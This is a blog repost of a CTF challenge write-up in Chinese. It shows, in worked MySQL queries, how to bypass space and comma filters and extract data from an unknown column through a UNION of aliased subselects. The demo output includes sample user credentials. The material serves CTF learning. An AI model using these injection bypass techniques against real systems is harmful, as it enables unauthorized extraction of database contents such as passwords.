mysql 特殊字段名_Mysql如何巧妙的绕过未知字段名详解

最新推荐文章于 2021-11-07 16:24:41 发布
最新推荐文章于 2021-11-07 16:24:41 发布
阅读量182 收藏
点赞数
文章标签: mysql 特殊字段名
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29026443/article/details/114336145
版权

前言

本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:

实现思路

题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;

+---+---+---+---+

| a | b | c | d |

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;

+---+-------+----------+-------------+

| 1 | 2 | 3 | 4 |

+---+-------+----------+-------------+

| 1 | 2 | 3 | 4 |

| 1 | admin | admin888 | 110@110.com |

| 2 | test | test123 | 119@119.com |

| 3 | cs | cs123 | 120@120.com |

+---+-------+----------+-------------+

4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;

+-------------+

| 4 |

+-------------+

| 4 |

| 110@110.com |

| 119@119.com |

| 120@120.com |

+-------------+

4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;

+-------------+

| 4 |

+-------------+

| 120@120.com |

+-------------+

1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d

union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;

+-------------+----------+----------+-------------+

| id | username | password | email |

+-------------+----------+----------+-------------+

| 1 | admin | admin888 | 110@110.com |

| 120@120.com | 1 | 1 | 1 |

+-------------+----------+----------+-------------+

2 rows in set (0.04 sec)

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。

您可能感兴趣的文章:防止xss和sql注入:JS特殊字符过滤正则

一个过滤重复数据的 SQL 语句

MySQL注入绕开过滤的技巧总结

SQL注入中绕过 单引号 限制继续注入

SQL注入绕过的技巧总结

多列复合索引的使用 绕过微软sql server的一个缺陷

关于SQL注入绕过的一些知识点

SQL Server简单模式下误删除堆表记录恢复方法(绕过页眉校验)

SQL注入技巧之显注与盲注中过滤逗号绕过详析

A-蓝色弧线
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 特殊字段名_MySQL建表语句的一些特殊字段
weixin_33608403的博客
01-20 209
现代3D图形编程学习-基础简介(2) (译)本书系列 现代3D图形编程学习 基础简介(2) 图形和渲染 接下去的内容对渲染的过程进行粗略介绍.遇到的部分内容不是很明白也没有关系,在接下去的章节中,会被具体阐述. 你在电脑屏幕上看到的任何东西,包 ...TJI读书笔记07-初始化TJI读书笔记07-初始化 成员初始化 构造方法初...
mysql特殊字段名称_Mysql必读MySQL创建带特殊字符的数据库名称方法示例
weixin_33162074的博客
02-02 1277
MysqL必读MysqL创建带特殊字符的数据库名称方法示例》要点:本文介绍了MysqL必读MysqL创建带特殊字符的数据库名称方法示例,希望对您有用。如果有疑问,可以联系我们。文章抓哟讲解了关于如何实现在MysqL中创建带有特殊字符的数据库名称,这里的特殊字符包含:!@#$%^数据库名称包含住,反引号`(使用引号是不可以的)即在英文输入法状态下,按Esc键对应下方的键即可出来.当然在没有使用反引...
mysql列名名称包含特殊字符的处理
weixin_33713707的博客
07-20 3552
上问题    不做处理的话会报错,识别不了 处理方式就是 需要把列名以反引号“`”(一般键盘的左上角数字1左边的那个键)来处理。 即查询语句为 欢迎大家一起说出自己的想法。 ...
mysql特殊字段名称_Mysql 数据库批量调整字段名称中的特殊字符
weixin_28406969的博客
02-02 320
根据以下语句获取处理语句;SELECT case when DATA_TYPE= 'varchar' then CONCAT('ALTER TABLE ',TABLE_NAME , ' CHANGE ' ,COLUMN_NAME,' ', REPLACE(COLUMN_NAME, '_', '') ,' ',DATA_TYPE,'(',CHARACTER_MAXIMUM_LENGTH,')...
mysql特殊字段名称,如何在MySQL列名称中使用特殊字符?
weixin_31006689的博客
01-18 376
Here is my failing MySQL code:CREATE TABLE product (id int NOT NULL AUTO_INCREMENT,'item-name' VARCHAR(255) NOT NULL,'item-description' TEXT,'listing-id' VARCHAR(50),PRIMARY KEY (id))The error is:Erro...
mysql 特殊字段_mysql特殊字段类型讲解
weixin_29024675的博客
01-21 684
(1)mysql的安装(2)数据库产品介绍(3)安装mysql,以及基本的使用(4)mysq的建库和建表(5)修改表对应的属性(6)mysql数据库的多种连接方式(7)mysql添加数据(8)mysql作业实战(9)mysql中各种各种字段类型(10)mysql中update操作(11)mysql数据连接详细讲解(12)java的jdbc连接数据库(13)通过jdbc实现增删改查一阶段(14)通过...
Mysql如何巧妙绕过未知字段名详解
09-09
本篇将详细介绍如何巧妙绕过未知字段名的限制,通过提供的示例代码进行学习。 首先,我们要知道MySQL提供了多种方式来规避对特定字符(如空格和逗号)的过滤。例如,当空格被过滤时,我们可以使用 `%0a`、`%0b`、...
mysql 字段as详解及实例代码
09-10
但是为了避免语法上的歧义,比如字段名和别名之间没有逗号可能导致错误,推荐始终使用`AS`关键字来明确指定别名。 ### 2. 表别名(Table Aliases) 在涉及到多表联接的查询中,`AS`同样可以用于为表创建别名,简化...
Mysql中LAST_INSERT_ID()的函数使用详解
12-15
例如,假设你有一个名为`students`的表,其中有一个自增的`student_id`字段,你可以通过以下方式使用LAST_INSERT_ID(): ```sql INSERT INTO students (name) VALUES ('John'); SET @last_student_id = LAST_INSERT...
MYSQL_C_API详解1
最新发布
08-03
5. MYSQL_FIELD_OFFSET:是一个相对一个MySQL字段表的偏移量的类型安全的表示。 MYSQL_C_API的使用可以使得C程序更加方便地访问和操作数据库,但需要遵守一定的规则和约定,以避免冲突和错误。 在使用MYSQL_C_API...
MySQL 中查找含有目标字段的表的方法
12-15
通过指定`COLUMN_NAME`为我们要找的字段名,就能得到包含该字段的所有表的列表,包括其所在的数据库(`TABLE_SCHEMA`)和表名(`TABLE_NAME`)。 接下来,我们将讨论与这个主题相关的其他知识点: 1. **在MySQL中...
MYSQL数据库列名带有特殊字符
Mr_J0304的博客
11-07 1398
创建表的时候遇到了一个问题,即列名需要带有中文字符和特殊字符(如:Wi-Fi信号放大器),但是create的时候总是报错ERROR1046 查阅了一下,需要用反引号`\`` 最后的执行命令如下: create table AllInfo (room_index INT NOT NULL, `Wi-Fi信号放大器` INT, `晾衣架` INT, `电视` INT,
mysql字段不明确_数据库表不确定字段解决方案
weixin_42373066的博客
01-19 2129
文章首发在个人博客分析通常来说,在需求分析阶段会确定数据库表中的字段,同时也普遍存在一种需求,那就是表中的字段除了常见的以外,还存在一些不确定的字段。譬如电商系统,有一个 products 表保存商品记录,然而各行各业的商品信息不一样,不可能因为某一行业商品特有的属性而在表中添加一个字段。面对这样的需求,如何设计数据库呢?对策文中提出来的解决方案的前提是系统所用的数据库支持 hash 数据类型,其...
mysql 关键词绕过_SQL注入绕过技术
weixin_40007189的博客
02-17 284
原标题:SQL注入绕过技术1、大小写绕过注入大小写绕过注入的测试地址:http://ccctf.cn/sql/1.php?id=1。访问id=1',发现页面报出MySQL错误,当访问id=1 and 1=1时,页面返回“no hack”,显然是被拦截了,说明有关键词被过滤。使用关键字大小写的方式尝试绕过,如And 1=1(任意字母大小写都可以,如aNd 1=1,AND 1=1等),可以看到访问id...
解决未知行数的多行字符串输入问题
m0_54734728的博客
10-11 2037
解决未知行数的多行字符串输入问题 类似问题描述 解决方案: 第一种 第二种: 对应的 #include <stdio.h> int main() { //To read numbers int n; while(~(scanf("%d",&n)!=EOF)) { printf("%d",n); //在里面进行相应操作就行 } //To read characters int c; while(~(sca
mysql 未知的数据库_Mysql绕过未知字段名的方法
weixin_35152781的博客
02-04 179
Mysql绕过未知字段名的方法发布时间:2020-09-28 17:43:30来源:亿速云阅读:60作者:小新小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!前言本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看...
C char数组出现未知字符
xiaolan7777777的博客
11-01 615
因太久没有写c,在用char数组表示字符串时,出现了未知字符。 当时编写的代码类似 #include <stdio.h> int main() { char s[10]; s[0]='a'; s[1]='b'; s[2]='c'; s[3]='d'; s[4]='e'; s[5]='f'; s[6]='g'; printf("%s\n",s); s[7]='h'; printf("%s\n",s); s[8]='\0'; printf("%s\n",s); s[8]=
python:正确的对未知编码的字符串进行预处理-Unicode-UTF8-gbk
abednego1979的专栏
04-09 1774
由于计算机只能识别二进制数据,所以指望程序自动的猜出字符串是如何编码的很难。 而现实中,我们经常得到编码方式未知的字符串,我们总是希望能将这些字符串先统一预转换为unicode编码,在处理以后再根据需要编码到需要的格式 为了判断原始字符串的编码格式,可以采用chardet模块 我编写了下面的一个函数,用以从文件中读取信息,并统一转换为unicode格式返回,同时返回的还有数据
mysql查询条件带有特殊字符_MySQL查询以选择带有特殊字符的特定字符串
weixin_42601547的博客
02-02 1342
让我们首先创建一个表-mysql>createtableDemoTable(Titletext);使用插入命令在表中插入一些记录-mysql>insertintoDemoTablevalues('MySQL');mysql>insertintoDemoTablevalues('MongoDB\'s');mysql>insertintoDemoT...
MySQL表操作实战教程:表结构与字段类型详解
每个字段由一个字段名(Field Name)标识。不同的字段横向形成一条记录关系,这就是表格里的一行。关系模型由行和列组成的二维表,就是关系数据库的关系模型,用于记录对应关系的数据列。 字段类型是字段定义的字段...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值